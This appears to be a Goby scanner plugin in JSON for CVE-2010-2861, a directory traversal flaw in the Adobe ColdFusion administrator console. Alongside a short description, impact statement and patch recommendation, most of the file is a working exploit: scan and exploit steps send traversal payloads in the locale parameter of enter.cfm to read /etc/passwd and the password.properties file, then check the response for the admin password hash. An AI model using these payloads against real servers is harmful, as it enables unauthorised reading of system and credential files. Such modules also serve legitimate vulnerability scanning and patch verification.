{ "Name": "Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI CVE-2010-2861", "Level": "2", "Tags": [ "lfi" ], "GobyQuery": "app=\"Adobe-ColdFusion\"", "Description": "Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995. ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By version 2, it became a full platform that included an IDE in addition to a full scripting language.", "Product": "Adobe ColdFusion", "Homepage": "https://www.adobe.com/products/coldfusion-family.html", "Author": "", "Impact": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.", "Recommendation": "Apply the fix described in Adobe security bulletin APSB10-18 (http://www.adobe.com/support/security/bulletins/apsb10-18.html) and restrict access to the /CFIDE/administrator console to trusted networks.", "References": [ "https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861", "http://www.adobe.com/support/security/bulletins/apsb10-18.html" ], "HasExp": true, "ExpParams": [ { "Name": "Filepath", "Type": "select", "Value": "../../../../../../../../../../etc/passwd%00en,../../../../../../../lib/password.properties%00en" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "rdspassword=", "bz": "" }, { "type": "item", "variable": "$body", "operation": 
"contains", "value": "encrypted=", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/CFIDE/administrator/enter.cfm?locale={{{Filepath}}}", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }